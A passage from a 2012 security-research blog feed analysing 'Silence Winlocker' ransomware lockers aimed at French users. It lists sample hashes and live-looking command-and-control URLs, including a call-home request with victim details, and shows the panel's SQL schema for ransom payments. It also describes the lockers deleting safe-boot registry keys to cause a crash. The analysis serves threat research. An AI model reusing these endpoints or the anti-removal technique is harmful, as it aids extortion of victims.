/&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/phoenix-exploits-kit-31-full.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-bVIxViCWEqY/T5uUbbCXjuI/AAAAAAAAFyM/qe6Q1wex4Q8/s72-c/alexudakov.PNG" height="72" width="72" /><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-2063037032381152009</guid><pubDate>Fri, 20 Apr 2012 19:26:00 +0000</pubDate><atom:updated>2012-05-05T16:58:19.208+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">winlock</category><category domain="http://www.blogger.com/atom/ns#">sacem</category><category domain="http://www.blogger.com/atom/ns#">life</category><category domain="http://www.blogger.com/atom/ns#">Silence Winlocker</category><title>Silence Winlocker</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-GPVn5c6xlaE/T5GuDk2PwGI/AAAAAAAAFuU/rw8vv6PulhY/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="135" src="http://4.bp.blogspot.com/-GPVn5c6xlaE/T5GuDk2PwGI/AAAAAAAAFuU/rw8vv6PulhY/s400/email.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;And ther answer is... yes!&lt;br /&gt;I continue to keep an eye on these winlocks, here are some interesting cases:&lt;br /&gt;&lt;br /&gt;MD5: &lt;b style="color: red;"&gt;C7C6735C0A143E54CAAEB38FFF252E49&lt;/b&gt;&lt;br /&gt;Sacem, winlock targeting French ppl.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bm8D-pNMEeM/T6U_6_50LcI/AAAAAAAAF2k/C0X5EBS8Oe4/s1600/sacem.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="262" src="http://3.bp.blogspot.com/-bm8D-pNMEeM/T6U_6_50LcI/AAAAAAAAF2k/C0X5EBS8Oe4/s400/sacem.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;This winlock appeared when i got more important things to do than tracking malwares so i've not investigated alot on this one... &lt;br /&gt;This winlock was deserved via blackhole and the winlock stuff hosted on the same BH server.&lt;br /&gt;&lt;br /&gt;The following urls were found:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;http://panuniv1.com/universal2/universalbezahlung/frankreich/&lt;br /&gt;http://panuniv1.com/universal2/universalbezahlung/england/&lt;br /&gt;http://panuniv1.com/universal2/universalbezahlung/deutschland/&lt;br /&gt;http://panuniv1.com/universal2/universalbezahlung/holland/&lt;br /&gt;http://panuniv1.com/universal2/universalbezahlung/schweiz/&lt;br /&gt;http://panuniv1.com/4/&lt;br /&gt;http://panuniv1.com/connect/gate.php&lt;br /&gt;http://panuniv1.com/universal2/redirector/redirector.php&lt;br /&gt;http://panuniv1.com/universal2/universalpanel/gate.php?hwid=2140809940&amp;amp;pc=XYLITOL-F12F085&amp;amp;localip=192.168.142.128&amp;amp;winver=Windows%20XP%20Professional%20x32&lt;br /&gt;http://panuniv1.com/server-status/&lt;br /&gt;http://panuniv1.com/phpmyadmin/&lt;br /&gt;http://panuniv1.com/config/&lt;br /&gt;http://panuniv1.com/3467/&lt;br /&gt;http://panuniv1.com/bhadmin.php&lt;/div&gt;&lt;br /&gt;C&amp;amp;C fail?:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;http://panuniv1.com/universal2/universalbezahlung/frankreich/edit.php&lt;br /&gt;-&amp;gt; Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'mfeeling_gema'@'localhost' (using password: YES) in /var/www/html/universal2/universalbezahlung/frankreich/inc/connect.php on line 2&lt;br /&gt;could not connectAccess denied for user 'mfeeling_gema'@'localhost' (using password: YES)&lt;br /&gt;&lt;br /&gt;http://panuniv1.com/universal2/universalbezahlung/frankreich/insert.php&lt;br /&gt;-&amp;gt; Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /var/www/html/universal2/universalbezahlung/frankreich/insert.php on line 3&lt;br /&gt;Access denied for user 'root'@'localhost' (using password: NO)&lt;/div&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;MD5: &lt;b style="color: red;"&gt;F683C185A9EDE59394E163E7FB4C247D&lt;/b&gt;&lt;br /&gt;Police nationale, winlock targeting french ppl (the background image change in function of your location)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-dnIrHezhndc/T5GZ0ZqqvEI/AAAAAAAAFt0/6XX1MeOb304/s1600/police.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-dnIrHezhndc/T5GZ0ZqqvEI/AAAAAAAAFt0/6XX1MeOb304/s400/police.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Control panel (still in brute force)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-v9yJS7dLWTo/T5GbgcfJYWI/AAAAAAAAFuE/6xuVCf_KA7A/s1600/login.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-v9yJS7dLWTo/T5GbgcfJYWI/AAAAAAAAFuE/6xuVCf_KA7A/s400/login.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Install:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-TEaYpgZY1Rc/T5pHc_MVE0I/AAAAAAAAFwI/x4N1e18tdVw/s1600/install.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-TEaYpgZY1Rc/T5pHc_MVE0I/AAAAAAAAFwI/x4N1e18tdVw/s400/install.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The following urls were found:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;http://109.236.88.220/Lc6zs7cJ7U/index.php&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/getunlock.php&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/unlock.php&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/install.php &lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/picture.php?pin=0123456789123456&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap-responsive.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap-responsive.min.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/bootstrap.min.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/border-radius.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/jscal2.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/reduce-spacing.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/shadow-b.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/style.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg-hard-inv.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg-hard.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg-inv.png&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/cool-bg.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/drop-down.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/drop-up.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-left-x2.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-left.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-right-x2.gif&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/nav-right.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/time-down.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/img/time-up.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/steel/brushed-steel.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/steel/brushed-steel.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/steel/coolbg.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/steel/steel.css&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/css/steel/steel.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/CA.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/DE.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/ES.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/FR.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/GR.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/IT.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/PT.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/UK.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/upload/default.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/include/db.php&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/include/config.php&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/include/geoip.inc&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/img/glyphicons-halflings.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/img/glyphicons-halflings-white.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/img/logo.png&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/img/logo.jpg&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/FR.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/Unknown.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/AR.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/SV.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/RS.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/PE.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/NI.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/LI.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/HT.WOA.gif&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/flags/CR.WOA.gif &lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/sql/db.sql&lt;br /&gt;http://109.236.88.220/Lc6zs7cJ7U/tmp/get.php &lt;br /&gt;&lt;br /&gt;http://109.236.88.220/SE4rFBwKlt/&lt;br /&gt;http://109.236.88.220/wEP3Krh5AE/&lt;br /&gt;http://109.236.88.220/P0sryovk9M/&lt;br /&gt;http://91.217.153.50/adm/ &lt;/div&gt;&lt;br /&gt;logo.png&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-qS4DJFiP9DM/T5GasizJ5AI/AAAAAAAAFt8/4Z03u3Ftmoo/s1600/logo.png" /&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;db.sql:&lt;br /&gt;&lt;div class="sql" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- phpMyAdmin SQL Dump&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- version 3.3.3&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- http://www.phpmyadmin.net&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Host: localhost&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Generation Time: Mar 18, 2012 at 11:28 PM&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Server version: 5.1.54&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- PHP Version: 5.3.7-ZS5.5.0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #993333; font-weight: bold;"&gt;SET&lt;/span&gt; SQL_MODE&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;&lt;span style="color: red;"&gt;"NO_AUTO_VALUE_ON_ZERO"&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;/*!40101 SET NAMES utf8 */&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Database: `cp`&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- --------------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Table structure for table `billing`&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #993333; font-weight: bold;"&gt;CREATE&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;TABLE&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;IF&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;EXISTS&lt;/span&gt; &lt;span style="color: red;"&gt;`billing`&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`id`&lt;/span&gt; int&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;255&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;AUTO_INCREMENT&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`ucash`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`psc`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`ip`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`country`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`date`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`go`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;99&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: #993333; font-weight: bold;"&gt;PRIMARY&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;KEY&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;`id`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; ENGINE&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;MyISAM &amp;nbsp;&lt;span style="color: #993333; font-weight: bold;"&gt;DEFAULT&lt;/span&gt; CHARSET&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;latin1 &lt;span style="color: #993333; font-weight: bold;"&gt;AUTO_INCREMENT&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;45&lt;/span&gt; ;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Dumping data for table `billing`&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- --------------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Table structure for table `checklist`&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #993333; font-weight: bold;"&gt;CREATE&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;TABLE&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;IF&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;EXISTS&lt;/span&gt; &lt;span style="color: red;"&gt;`checklist`&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`id`&lt;/span&gt; int&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;255&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;AUTO_INCREMENT&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`ip`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`country`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: red;"&gt;`date`&lt;/span&gt; varchar&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;999&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NOT&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;NULL&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: #993333; font-weight: bold;"&gt;PRIMARY&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;KEY&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;`id`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; ENGINE&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;MyISAM &amp;nbsp;&lt;span style="color: #993333; font-weight: bold;"&gt;DEFAULT&lt;/span&gt; CHARSET&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;latin1 &lt;span style="color: #993333; font-weight: bold;"&gt;AUTO_INCREMENT&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;=&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;314&lt;/span&gt; ;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;-- Dumping data for table `checklist`&lt;/span&gt;&lt;br /&gt;&lt;span style="color: grey; font-style: italic;"&gt;--&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Silence Winlocker advertising:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-82p6rXTRySw/T5G1gAq26gI/AAAAAAAAFuc/GD-aAOCPwrU/s1600/20-04-2012+21-13-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://4.bp.blogspot.com/-82p6rXTRySw/T5G1gAq26gI/AAAAAAAAFuc/GD-aAOCPwrU/s640/20-04-2012+21-13-22.png" width="403" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;And a second 'Silence winlocker' powered winlock (according to the control panel):&lt;br /&gt;&lt;br /&gt;MD5: &lt;b style="color: red;"&gt;6D8DB0D28948A4D91A30E51C6901BBA0&lt;/b&gt;&lt;br /&gt;Gendarmerie, winlock targeting French ppl.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-tqKe-OYU9gc/T48NvTRT5KI/AAAAAAAAFss/ydHbLw_zh0k/s1600/18-04-2012+20-52-04.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-tqKe-OYU9gc/T48NvTRT5KI/AAAAAAAAFss/ydHbLw_zh0k/s400/18-04-2012+20-52-04.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Stuff  usual, remove safe boot registry keys responsible to store services  etc... for lead to a BSoD if the user try to remove it in safe mode.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-1dZjtONg1GY/T48VBpv9hCI/AAAAAAAAFs8/T1sPefQYlc0/s1600/bsod.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-1dZjtONg1GY/T48VBpv9hCI/AAAAAAAAFs8/T1sPefQYlc0/s400/bsod.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Check the lenghts of pins:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/--0hM1exkg-s/T48SqBwhVHI/AAAAAAAAFs0/MpK2tdfF7bA/s1600/lenght_check.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/--0hM1exkg-s/T48SqBwhVHI/AAAAAAAAFs0/MpK2tdfF7bA/s400/lenght_check.PNG" width="273" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Malware call home:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3esZRFVQY90/T5GH4_RidTI/AAAAAAAAFtM/4f0n79H2mTQ/s1600/18-04-2012+20-45-59.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-3esZRFVQY90/T5GH4_RidTI/AAAAAAAAFtM/4f0n79H2mTQ/s400/18-04-2012+20-45-59.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;PSC/Ukash pins:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-zcIomf5wgsg/T5GK639MlFI/AAAAAAAAFtU/hCWO9ClMN-k/s1600/18-04-2012+20-43-49.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-zcIomf5wgsg/T5GK639MlFI/AAAAAAAAFtU/hCWO9ClMN-k/s400/18-04-2012+20-43-49.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;reports.txt&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--XwYDyxVU_M/T5G1-bNondI/AAAAAAAAFuk/yJ2AbedD5pI/s1600/18-04-2012+20-44-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="http://4.bp.blogspot.com/--XwYDyxVU_M/T5G1-bNondI/AAAAAAAAFuk/yJ2AbedD5pI/s400/18-04-2012+20-44-11.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Richi fake:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-9sK--FIs74w/T5G2NI_bh2I/AAAAAAAAFus/y7NgOZRf72s/s1600/18-04-2012+20-47-09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-9sK--FIs74w/T5G2NI_bh2I/AAAAAAAAFus/y7NgOZRf72s/s400/18-04-2012+20-47-09.png" width="400" 